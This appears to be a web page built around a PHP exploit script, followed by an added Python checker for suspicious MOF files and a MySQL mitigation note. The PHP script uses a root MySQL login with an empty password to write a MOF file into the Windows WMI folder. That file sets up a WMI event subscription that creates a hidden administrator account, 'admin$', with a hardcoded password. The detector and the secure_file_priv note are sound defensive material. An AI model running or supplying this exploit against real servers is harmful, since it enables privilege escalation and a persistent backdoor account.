<?php
$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password='';
$mysql_database='mysql';
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
$cmdshell="net user admin$ qwe!@#123qwe /add";
$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\") instance of __EventFilter as \$EventFilter { EventNamespace = \"Root\\\\Cimv2\"; Name = \"filtP2\"; Query = \"Select * From __InstanceModificationEvent \" \"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \" \"And TargetInstance.Second = 5\"; QueryLanguage = \"WQL\"; }; instance of ActiveScriptEventConsumer as \$Consumer { Name = \"consPCSV2\"; ScriptingEngine = \"JScript\"; ScriptText = \"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\"; }; instance of __FilterToConsumerBinding { Consumer = \$Consumer; Filter = \$EventFilter; };";
mysql_select_db($mysql_database,$conn);
$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";
$result=mysql_query($sql);
mysql_close($conn);
?>
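The script above uses MySQL's INTO OUTFILE to drop a MOF file that registers an event filter, an ActiveScriptEventConsumer and a binding under root\subscription. The following Python triage check for MOF sources is an added example, not part of the original page; the names `scan_mof`, `prop`, `exampleFilter` and `exampleConsumer` are hypothetical, and the sample input is constructed with a placeholder script body.

```python
import re

# Consumer classes that execute code when the bound filter fires.
EXEC_CONSUMERS = {"activescripteventconsumer", "commandlineeventconsumer"}
LITERAL = r'"((?:[^"\\]|\\.)*)"'  # one MOF string literal, escapes allowed

def prop(text, name):
    """Join the adjacent string literals assigned to a MOF property."""
    m = re.search(r'\b' + name + r'\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);', text, re.I)
    if not m:
        return None
    return "".join(re.findall(LITERAL, m.group(1))).replace('\\"', '"')

def scan_mof(text):
    """Summarise a MOF source; flag filter + executing consumer + binding."""
    # Collapse backslash runs so differently escaped namespaces compare equal.
    namespaces = [re.sub(r"\\+", r"\\", n).lower() for n in
                  re.findall(r'#pragma\s+namespace\s*\(\s*"([^"]*)"\s*\)', text, re.I)]
    classes = {c.lower() for c in re.findall(r"\binstance\s+of\s+(\w+)", text, re.I)}
    report = {
        "subscription_ns": any(n.endswith("root\\subscription") for n in namespaces),
        "exec_consumers": sorted(classes & EXEC_CONSUMERS),
        "has_filter": "__eventfilter" in classes,
        "has_binding": "__filtertoconsumerbinding" in classes,
        "query": prop(text, "Query"),  # WQL trigger, useful for triage
    }
    report["suspicious"] = (bool(report["exec_consumers"])
                            and report["has_filter"] and report["has_binding"])
    return report

# Constructed sample: same structure as the MOF in the script, placeholder script body.
SAMPLE = r'''
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
  EventNamespace = "Root\\Cimv2"; Name = "exampleFilter"; QueryLanguage = "WQL";
  Query = "Select * From __InstanceModificationEvent "
          "Where TargetInstance Isa \"Win32_LocalTime\" "
          "And TargetInstance.Second = 5";
};
instance of ActiveScriptEventConsumer as $Consumer {
  Name = "exampleConsumer"; ScriptingEngine = "JScript";
  ScriptText = "PLACEHOLDER_SCRIPT";
};
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
'''

if __name__ == "__main__":
    print(scan_mof(SAMPLE))
```

On the database side, setting MySQL's `secure_file_priv` to a dedicated directory stops `SELECT ... INTO OUTFILE` from writing to the path the script targets.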